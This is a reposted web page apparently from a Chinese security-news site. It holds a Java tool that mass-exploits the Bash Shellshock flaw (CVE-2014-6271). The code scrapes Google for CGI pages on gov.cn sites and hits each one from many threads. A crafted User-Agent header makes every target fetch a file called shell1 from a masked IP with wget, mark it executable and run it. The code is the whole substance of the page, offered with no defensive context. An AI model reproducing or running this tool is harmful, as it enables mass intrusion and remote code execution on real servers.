Bash远程解析命令执行 CVE-2014-6271 google 批量
import java.io.IOException;
import java.net.URLDecoder;
import java.util.Queue;
import java.util.concurrent.LinkedBlockingQueue;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.jsoup.Connection;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;
public class Test extends Thread{
Queue strQeueu = new LinkedBlockingQueue ();
public Test(Queue strQeueu){
this.strQeueu = strQeueu;
}
public static String getResponse(String url) throws IOException{
try {
System.out.println("请求:"+url);
Connection.Response response = Jsoup.connect(url)
.userAgent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0")
.referrer("http://www.google.com.hk/")
.userAgent("() { :; }; /usr/bin/wget xxx.xxx.xxx.xxx/shell1 -O /tmp/shell1 | /bin/chmod 777 /tmp/shell1 | /tmp/shell1")
.ignoreHttpErrors(true)
.timeout(3000)
.execute();
return response.body();
} catch (IOException e) {
throw e;
}
}
public void run(){
while(true){
String str = strQeueu.poll();
if(str == null){
return ;
}
try {
getResponse(str);
} catch (Exception e) {
System.err.println(e);
}
}
}
public static void main(String[] args) throws IOException {
Document doc = Jsoup.connect("https://www.google.ws/search?q=filetype:cgi+inurl:cgi-bin+site:gov.cn&num=100&newwindow=1&biw=1440&bih=710&ei=qpojVIrRIJPX8gWU_4GwDg&start=300&sa=N").userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html)").timeout(5000).get();
Elements element = doc.getElementsByTag("h3");
Queue ls = new LinkedBlockingQueue ();
for (Element e : element) {
Matcher m= Pattern.compile("/url?q=(.*)&sa").matcher(e.getElementsByTag("a").get(0).attr("href"));
if(m.find()){
String url = URLDecoder.decode(m.group(1),"UTF-8");
if(url.contains("cgi")){
ls.offer(url);
}
}
}
ThreadGroup tg = new ThreadGroup("cgi");
int threadCount = ls.size() > 10 ? 10 : ls.size();
while (threadCount > 0) {
for (int i = 0; i < threadCount; i++) {
threadCount--;
new Thread(tg, new Test(ls)).start();
}
while (true) {
if (tg.activeCount() == 0) {
break;
}
}
}
}
}
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
站内编辑
关注网络尖刀微信公众号随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 蓝图已绘就 奋进正当时 7904461
- 2 31省份去年人口出生率数据公布 7808480
- 3 顶级大佬齐呼吁:暂停超级智能研发 7713764
- 4 未来五年怎么做 7619475
- 5 铁腚大巴游老年团:出门就像打鸡血 7520273
- 6 亚洲第一长洞已发现52具熊猫化石 7429091
- 7 2元维C和98元维C的区别 7329481
- 8 美方表达立场强硬 中方维护利益坚定 7238727
- 9 美媒爆料:印度仿制中国霹雳-15导弹 7136740
- 10 长江“病了” 禁渔五年变样了吗 7041031
